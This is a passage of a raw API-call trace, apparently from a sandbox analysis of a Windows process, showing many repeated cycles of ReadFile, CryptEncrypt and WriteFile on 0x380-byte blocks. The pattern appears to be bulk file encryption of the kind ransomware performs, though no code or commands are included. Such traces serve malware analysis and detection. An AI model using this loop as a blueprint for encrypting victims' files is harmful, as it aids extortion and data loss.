pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.353] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.353] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.353] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.353] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.353] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.353] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.353] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.353] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.353] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.353] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.353] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.354] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.354] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.354] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.354] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.354] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.354] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.354] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.354] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.354] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.354] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.354] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.354] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.354] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.354] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.354] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.354] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.354] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.354] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.355] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.355] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.355] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.355] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.355] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.355] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.355] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.355] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.355] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.355] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.355] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.355] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.355] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.355] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.355] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.356] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.356] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.356] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.356] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.356] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.356] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.356] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.356] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.356] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.356] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.356] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.356] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.357] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.357] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.357] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.357] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.357] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.357] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.357] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.357] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.357] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.357] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.357] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.357] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.357] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.357] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.358] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.358] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.358] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.358] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.358] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.358] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.358] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.358] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.358] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.358] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.358] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.358] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.358] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.358] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.359] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.359] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.359] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.359] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.359] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.359] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.359] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.359] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.359] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.359] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.359] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.359] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.359] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.360] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.360] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.360] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.360] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.360] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.360] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.360] ReadFile (in: 